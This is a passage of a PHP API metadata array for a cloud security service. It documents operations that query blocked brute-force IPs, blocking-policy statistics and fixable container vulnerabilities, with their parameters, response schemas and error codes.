'format' => 'int64', 'example' => '1671506882063', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server on which the defense rule takes effect.'."\n", 'type' => 'string', 'example' => '6d5b361f-958d-48a8-a9d2-d6e82c1****'."\n", 'title' => ''], 'InternetIp' => ['description' => 'The public IP address.'."\n", 'type' => 'string', 'example' => '120.79.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the server.'."\n", 'type' => 'string', 'example' => 'record-test-***', 'title' => ''], 'BlockIp' => ['description' => 'The IP address that is blocked.'."\n", 'type' => 'string', 'example' => '10.12.XX.XX', 'title' => ''], 'Port' => ['description' => 'The port that is attacked.'."\n", 'type' => 'string', 'example' => '22/22', 'title' => ''], 'Source' => ['description' => 'The type of the defense rule. Valid values:'."\n" ."\n" .'* **userRule**: custom rule'."\n" .'* **blinkRule**: system rule'."\n", 'type' => 'string', 'example' => 'userRule', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Id' => ['description' => 'The ID of the primary key that is recorded in the defense rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '112XX', 'title' => ''], 'RuleName' => ['description' => 'The name of the defense rule.'."\n", 'type' => 'string', 'example' => 'AntiRuleName', 'title' => ''], 'ErrorCode' => ['description' => 'The error code returned when the defense rule fails to block the IP address.'."\n", 'type' => 'string', 'example' => 'InstanceSecurityGroupLimitExceeded', 'title' => ''], 'BlockType' => ['description' => 'The blocking type. Valid values:'."\n" ."\n" .'* **group**: security group'."\n" .'* **alinet**: host network extension'."\n", 'type' => 'string', 'example' => 'alinet', 'title' => ''], 'AliNetOnline' => ['description' => 'The status of the host network extension. Valid values:'."\n" ."\n" .'* **true**: online'."\n" .'* **false**: offline'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeBruteForceRecords', 'summary' => 'Queries the IP addresses that are blocked by a defense rule against brute-force attacks.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBruteForceRecords'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBruteForceRecords', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 263,\\n \\"Count\\": 10\\n },\\n \\"MachineList\\": [\\n {\\n \\"Status\\": 2,\\n \\"BlockExpireDate\\": 1671506882063,\\n \\"Uuid\\": \\"6d5b361f-958d-48a8-a9d2-d6e82c1****\\\\n\\",\\n \\"InternetIp\\": \\"120.79.XX.XX\\",\\n \\"InstanceName\\": \\"record-test-***\\",\\n \\"BlockIp\\": \\"10.12.XX.XX\\",\\n \\"Port\\": \\"22/22\\",\\n \\"Source\\": \\"userRule\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"Id\\": 0,\\n \\"RuleName\\": \\"AntiRuleName\\",\\n \\"ErrorCode\\": \\"InstanceSecurityGroupLimitExceeded\\",\\n \\"BlockType\\": \\"alinet\\",\\n \\"AliNetOnline\\": false\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeBruteForceSummary' => [ 'summary' => 'Queries the statistics of IP address blocking policies that are used to defend against brute-force attacks and trigger alerts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '203.119.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'AE60EAE3-ABD0-897C-B0F16CAC6C7D', 'title' => ''], 'BruteForceSummary' => [ 'description' => 'The statistics of IP address blocking policies.'."\n", 'type' => 'object', 'properties' => [ 'AllStrategyCount' => ['description' => 'The number of anti-brute force IP blocking policies.', 'type' => 'integer', 'format' => 'int32', 'example' => '13', 'title' => ''], 'EffectiveCount' => ['description' => 'The number of anti-brute force IP blocking policies enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'AntiBruteForceRuleCount' => ['description' => 'The number of defense policies.'."\n", 'type' => 'string', 'example' => '2', 'title' => ''], 'CustomRecordCount' => ['description' => 'The number of custom blocking rules.'."\n", 'type' => 'string', 'example' => '19730', 'title' => ''], 'SystemRecordCount' => ['description' => 'The number of system blocking rules.'."\n", 'type' => 'string', 'example' => '2', 'title' => ''], 'CustomEffectiveCount' => ['description' => 'The number of custom blocking rules that are in effect.'."\n", 'type' => 'string', 'example' => '3', 'title' => ''], 'SystemEffectiveCount' => ['description' => 'The number of system blocking rules that are in effect.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeBruteForceSummary', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBruteForceSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBruteForceSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"AE60EAE3-ABD0-897C-B0F16CAC6C7D\\",\\n \\"BruteForceSummary\\": {\\n \\"AllStrategyCount\\": 13,\\n \\"EffectiveCount\\": 2,\\n \\"AntiBruteForceRuleCount\\": \\"2\\",\\n \\"CustomRecordCount\\": \\"19730\\",\\n \\"SystemRecordCount\\": \\"2\\",\\n \\"CustomEffectiveCount\\": \\"3\\",\\n \\"SystemEffectiveCount\\": \\"1\\"\\n }\\n}","type":"json"}]', ], 'DescribeCanAccessVpcSale' => [ 'summary' => 'Check if the asset can be sold by VPC', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92012', 'abilityTreeNodes' => ['FEATUREsas0KX1KI'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'CanAccess' => ['description' => 'Indicates whether the purchase can be made according to VPC.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of this call request, a unique identifier generated by Alibaba Cloud for this request, which can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CanAccess\\": true,\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', 'title' => 'Check if the Asset Can be Sold by VPC', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCanAccessVpcSale'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCanAccessVpcSale', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeCanFixVulList' => [ 'summary' => 'Queries the list of fixable vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The vulnerability type. Valid values:'."\n" .'- **cve**: system vulnerability'."\n" .'- **sca**: application vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of images. Separate multiple UUIDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'd15df12472809c1c3b158606c0f1****', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'scan:AVD-2022-953356', 'title' => ''], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The alias in the vulnerability advisory.', 'type' => 'string', 'required' => false, 'example' => 'RHSA-2017:0184-Important: mysql security update', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'schema' => ['description' => 'The fix status of the vulnerability. Valid values:'."\n" .'- **1**: Unfixed.'."\n" .'- **4**: Being fixed.'."\n" .'- **7**: Fixed.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Necessity', 'in' => 'query', 'schema' => ['description' => 'The priority levels of vulnerabilities to query. Separate multiple levels with commas (,). Valid values:'."\n" ."\n" .'- **asap**: high'."\n" .'- **later**: medium'."\n" .'- **nntf**: low.', 'type' => 'string', 'required' => false, 'example' => 'asap,later,nntf', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the vulnerability is handled. Valid values:'."\n" ."\n" .'**y**: Handled.'."\n" .'**n**: Not handled.', 'type' => 'string', 'required' => false, 'example' => 'n', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query. The value starts from 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'RepoRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the image repository. Valid values:'."\n" .'- **cn-beijing**: China (Beijing)'."\n" .'- **cn-zhangjiakou**: China (Zhangjiakou)'."\n" .'- **cn-hangzhou**: China (Hangzhou)'."\n" .'- **cn-shanghai**: China (Shanghai)'."\n" .'- **cn-shenzhen**: China (Shenzhen)'."\n" .'- **cn-hongkong**: Hong Kong (China)'."\n" .'- **ap-southeast-1**: Singapore'."\n" .'- **ap-southeast-5**: Indonesia (Jakarta)'."\n" .'- **us-east-1**: US (Virginia)'."\n" .'- **us-west-1**: US (Silicon Valley)'."\n" .'- **eu-central-1**: Germany (Frankfurt)'."\n" .'- **eu-west-1**: UK (London).', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The container image instance ID.'."\n" .'> Invoke the [ListRepository](~~451339~~) operation of Container Registry and obtain the container image instance ID from the **InstanceId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'cri-rv4nvbv8iju4****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the image repository.'."\n" .'> Call the [ListRepository](~~145293~~) operation of Container Registry and obtain the value of the **RepoId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'crr-avo7qp02simz2njo', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'digital-account', 'title' => ''], ], [ 'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the image repository.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'ns-digital-dev', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => 'digital-account', 'title' => ''], ], [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the image repository. Valid values:'."\n" .'- **cn-beijing**: China (Beijing)'."\n" .'- **cn-zhangjiakou**: China (Zhangjiakou)'."\n" .'- **cn-hangzhou**: China (Hangzhou)'."\n" .'- **cn-shanghai**: China (Shanghai)'."\n" .'- **cn-shenzhen**: China (Shenzhen)'."\n" .'- **cn-hongkong**: Hong Kong (China)'."\n" .'- **ap-southeast-1**: Singapore'."\n" .'- **ap-southeast-5**: Indonesia (Jakarta)'."\n" .'- **us-east-1**: US (Virginia)'."\n" .'- **us-west-1**: US (Silicon Valley)'."\n" .'- **eu-central-1**: Germany (Frankfurt)'."\n" .'- **eu-west-1**: UK (London).', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The container image instance ID.'."\n" .'> Invoke the [ListRepository](~~451339~~) operation of Container Registry and obtain the container image instance ID from the **InstanceId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'cri-rv4nvbv8iju4****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the image repository.'."\n" .'> Call the [ListRepository](~~145293~~) operation of Container Registry and obtain the value of the **RepoId** response parameter.', 'type' => 'string', 'required' => false, 'example' => 'crr-avo7qp02simz2njo', 'title' => ''], ], [ 'name' => 'Tag', 'in' => 'query', 'schema' => ['description' => 'The tag of the container image.', 'type' => 'string', 'required' => false, 'example' => '0.1.0', 'title' => ''], ], [ 'name' => 'Digest', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the container image.', 'type' => 'string', 'required' => false, 'example' => '8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c80f79959fd724a888e1187779b13****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The scan scope. Valid values:'."\n" ."\n" .'- **image**: Image.'."\n" .'- **container**: Container.', 'type' => 'array', 'items' => ['description' => 'The collection of scan scopes. Valid values:'."\n" ."\n" .'- **image**: Image.'."\n" .'- **container**: Container.', 'type' => 'string', 'required' => false, 'example' => 'image,container', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the container cluster.', 'type' => 'string', 'required' => false, 'example' => 'sas-test-cnnf', 'title' => ''], ], [ 'name' => 'ContainerId', 'in' => 'query', 'schema' => ['description' => 'The container ID.', 'type' => 'string', 'required' => false, 'example' => '48a6d9a92435a13ad573372c3f3c63b7e04d106458141df9f92155709d5a****', 'title' => ''], ], [ 'name' => 'Pod', 'in' => 'query', 'schema' => ['description' => 'The name of the pod.', 'type' => 'string', 'required' => false, 'example' => '22222-7xsqq'."\n", 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The cluster namespace.'."\n" .'> You can call the [GetOpaClusterNamespaceList](~~GetOpaClusterNamespaceList~~) operation to query this value.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], ], [ 'name' => 'Image', 'in' => 'query', 'schema' => ['description' => 'The name of the container image.', 'type' => 'string', 'required' => false, 'example' => 'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-****'."\n", 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'PlainResult>', 'type' => 'object', 'properties' => [ 'VulRecords' => [ 'description' => 'The vulnerability information returned.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability information returned.', 'type' => 'object', 'properties' => [ 'CanUpdate' => ['description' => 'Specifies whether the software package that causes the vulnerability can be upgraded through Security Center. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Type' => ['description' => 'The vulnerability type. Valid values:'."\n" .'- **cve**: system vulnerability'."\n" .'- **sca**: application vulnerability.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'Status' => ['description' => 'The fix status of the vulnerability. Valid values:'."\n" .'- **1**: Unfixed.'."\n" .'- **4**: Being fixed.'."\n" .'- **7**: Fixed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ModifyTs' => ['description' => 'The timestamp when the vulnerability status was modified, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1620404763000', 'title' => ''], 'ImageDigest' => ['description' => 'The unique identifier of the container image.', 'type' => 'string', 'example' => '8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****', 'title' => ''], 'PrimaryId' => ['description' => 'The ID of the vulnerability.', 'type' => 'integer', 'format' => 'int64', 'example' => '782661', 'title' => ''], 'Tag' => ['description' => 'The tag of the container image.', 'type' => 'string', 'example' => 'latest', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the container image repository.', 'type' => 'string', 'example' => '3rdparty', 'title' => ''], 'RepoName' => ['description' => 'The name of the container image repository.', 'type' => 'string', 'example' => 'varnish', 'title' => ''], 'Related' => ['description' => 'The list of CVEs associated with the vulnerability. Multiple values are separated by commas (,).', 'type' => 'string', 'example' => 'CVE-2017-7518,CVE-2017-12188', 'title' => ''], 'FirstTs' => ['description' => 'The timestamp when the vulnerability was first detected, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1620752053000', 'title' => ''], 'LastTs' => ['description' => 'The timestamp when the vulnerability was last detected, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1620404763000', 'title' => ''], 'Necessity' => ['description' => 'The priority level of the vulnerability fix. Valid values:'."\n" ."\n" .'- **asap**: High.'."\n" .'- **later**: Medium.'."\n" .'- **nntf**: Low.'."\n" ."\n" .'> Fix vulnerabilities with the **High** priority level as soon as possible.', 'type' => 'string', 'example' => 'asap,later,nntf', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the container image.', 'type' => 'string', 'example' => '0004a32a0305a7f6ab5ff9600d47****', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'CVE-2018-25010:libwebp up to 1.0.0 ApplyFilter out-of-bounds read', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'debian:10:CVE-2019-9893', 'title' => ''], 'Layers' => [ 'description' => 'The list of container image layers.', 'type' => 'array', 'items' => ['description' => 'The list of container image layers.', 'type' => 'string', 'example' => '["8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****"]', 'title' => ''], 'title' => '', 'example' => '', ], 'ExtendContentJson' => [ 'description' => 'The extended content of the vulnerability information.', 'type' => 'object', 'properties' => [ 'OsRelease' => ['description' => 'The release version of the operating system corresponding to the container image.', 'type' => 'string', 'example' => '10.9', 'title' => ''], 'Os' => ['description' => 'The name of the operating system.', 'type' => 'string', 'example' => 'debian', 'title' => ''], 'RpmEntityList' => [ 'description' => 'The list of RPM packages.', 'type' => 'array', 'items' => [ 'description' => 'The list of RPM packages.', 'type' => 'object', 'properties' => [ 'MatchList' => [ 'description' => 'The rule hits.', 'type' => 'array', 'items' => ['description' => 'The rule hits.', 'type' => 'string', 'example' => '["libstdc++ version less than 8.5.0-4.el8_5"]', 'title' => ''], 'title' => '', 'example' => '', ], 'Layer' => ['description' => 'The SHA256 value of the container image layer digest.', 'type' => 'string', 'example' => 'b1f5b9420803ad0657cf21566e3e20acc08581e7f22991249ef3aa80b8b1****', 'title' => ''], 'FullVersion' => ['description' => 'The full version number of the software package.', 'type' => 'string', 'example' => '3.10.0-693.2.2.el7', 'title' => ''], 'Version' => ['description' => 'The version number of the software package.', 'type' => 'string', 'example' => '3.10.0', 'title' => ''], 'MatchDetail' => ['description' => 'The detailed information about the vulnerability match.', 'type' => 'string', 'example' => 'python-perf version less than 0:3.10.0-693.21.1.el7', 'title' => ''], 'Path' => ['description' => 'The path of the software that contains the vulnerability.', 'type' => 'string', 'example' => '/usr/lib64/python2.7/site-packages', 'title' => ''], 'Name' => ['description' => 'The name of the software package.', 'type' => 'string', 'example' => 'python-perf', 'title' => ''], 'UpdateCmd' => ['description' => 'The command used to fix the vulnerability.', 'type' => 'string', 'example' => 'apt-get update && apt-get install libseccomp2 --only-upgrade', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'CanFix' => ['description' => 'Indicates whether the vulnerability can be fixed in the console. Valid values:'."\n" ."\n" .'- **yes**: Fixable.'."\n" .'- **no**: Not fixable.', 'type' => 'string', 'example' => 'yes', 'title' => ''], 'ClusterId' => ['description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c08d5fc1a329a4b88950a253d082f1****'."\n", 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'docker-law'."\n", 'title' => ''], 'Pod' => ['description' => 'The name of the pod.', 'type' => 'string', 'example' => '22222-7xsqq'."\n", 'title' => ''], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'test-002'."\n", 'title' => ''], 'Image' => ['description' => 'The image name.', 'type' => 'string', 'example' => 'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****'."\n", 'title' => ''], 'ContainerId' => ['description' => 'The container ID.', 'type' => 'string', 'example' => '04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****'."\n", 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the asset.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the asset.', 'type' => 'string', 'example' => '172.19.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.'."\n" ."\n" .'The name must be 3 to 64 characters in length and can contain letters, digits, hyphens (-), and underscores (_).', 'type' => 'string', 'example' => 'testInstance', 'title' => ''], 'TargetId' => ['description' => 'The ID of the scan target.', 'type' => 'string', 'example' => '300269', 'title' => ''], 'TargetName' => ['description' => 'The name of the scan target.', 'type' => 'string', 'example' => 'source-test-obj-XM0Ma', 'title' => ''], 'MaliciousSource' => ['description' => 'The source of the malicious file. Valid values:'."\n" ."\n" .'- **agentless**: Agentless detection.'."\n" .'- **image**: Image.'."\n" .'- **container**: Container.', 'type' => 'string', 'example' => 'agentless', 'title' => ''], 'TargetType' => ['description' => 'The object type of the scan target. Valid values:'."\n" ."\n" .'- **IMAGE**: Container image.'."\n" .'- **ECS_IMAGE**: Host image.'."\n" .'- **ECS_SNAPSHOT**: Snapshot.', 'type' => 'string', 'example' => 'ECS_IMAGE', 'title' => ''], 'ScanTime' => ['description' => 'The timestamp of the scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649814050000', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '1408FDB3-46F4-513C-9918-FE7D356DF048', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query fixable vulnerabilities', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCanFixVulList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCanFixVulList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"VulRecords\\": [\\n {\\n \\"CanUpdate\\": true,\\n \\"Type\\": \\"cve\\",\\n \\"Status\\": 1,\\n \\"ModifyTs\\": 1620404763000,\\n \\"ImageDigest\\": \\"8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****\\",\\n \\"PrimaryId\\": 782661,\\n \\"Tag\\": \\"latest\\",\\n \\"RepoNamespace\\": \\"3rdparty\\",\\n \\"RepoName\\": \\"varnish\\",\\n \\"Related\\": \\"CVE-2017-7518,CVE-2017-12188\\",\\n \\"FirstTs\\": 1620752053000,\\n \\"LastTs\\": 1620404763000,\\n \\"Necessity\\": \\"asap,later,nntf\\",\\n \\"Uuid\\": \\"0004a32a0305a7f6ab5ff9600d47****\\",\\n \\"AliasName\\": \\"CVE-2018-25010:libwebp up to 1.0.0 ApplyFilter out-of-bounds read\\",\\n \\"Name\\": \\"debian:10:CVE-2019-9893\\",\\n \\"Layers\\": [\\n \\"[\\\\\\"8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d50****\\\\\\"]\\"\\n ],\\n \\"ExtendContentJson\\": {\\n \\"OsRelease\\": \\"10.9\\",\\n \\"Os\\": \\"debian\\",\\n \\"RpmEntityList\\": [\\n {\\n \\"MatchList\\": [\\n \\"[\\\\\\"libstdc++ version less than 8.5.0-4.el8_5\\\\\\"]\\"\\n ],\\n \\"Layer\\": \\"b1f5b9420803ad0657cf21566e3e20acc08581e7f22991249ef3aa80b8b1****\\",\\n \\"FullVersion\\": \\"3.10.0-693.2.2.el7\\",\\n \\"Version\\": \\"3.10.0\\",\\n \\"MatchDetail\\": \\"python-perf version less than 0:3.10.0-693.21.1.el7\\",\\n \\"Path\\": \\"/usr/lib64/python2.7/site-packages\\",\\n \\"Name\\": \\"python-perf\\",\\n \\"UpdateCmd\\": \\"apt-get update && apt-get install libseccomp2 --only-upgrade\\"\\n }\\n ]\\n },\\n \\"CanFix\\": \\"yes\\",\\n \\"ClusterId\\": \\"c08d5fc1a329a4b88950a253d082f1****\\\\n\\",\\n \\"ClusterName\\": \\"docker-law\\\\n\\",\\n \\"Pod\\": \\"22222-7xsqq\\\\n\\",\\n \\"Namespace\\": \\"test-002\\\\n\\",\\n \\"Image\\": \\"registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-conta****\\\\n\\",\\n \\"ContainerId\\": \\"04d20e98c8e2c93b7b864372084320a15a58c8671e53c972ce3a71d9c163****\\\\n\\",\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"IntranetIp\\": \\"172.19.XX.XX\\",\\n \\"InstanceName\\": \\"testInstance\\",\\n \\"TargetId\\": \\"300269\\",\\n \\"TargetName\\": \\"source-test-obj-XM0Ma\\",\\n \\"MaliciousSource\\": \\"agentless\\",\\n \\"TargetType\\": \\"ECS_IMAGE\\",\\n \\"ScanTime\\": 1649814050000\\n }\\n ],\\n \\"RequestId\\": \\"1408FDB3-46F4-513C-9918-FE7D356DF048\\"\\n}","type":"json"}]', ], 'DescribeCanTrySas' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'properties' => [ 'CanTry' => ['description' => 'Indicates whether you have the permissions on the trial use of Security Center. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'example' => '0', 'format' => 'int32', 'type' => 'integer', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'example' => 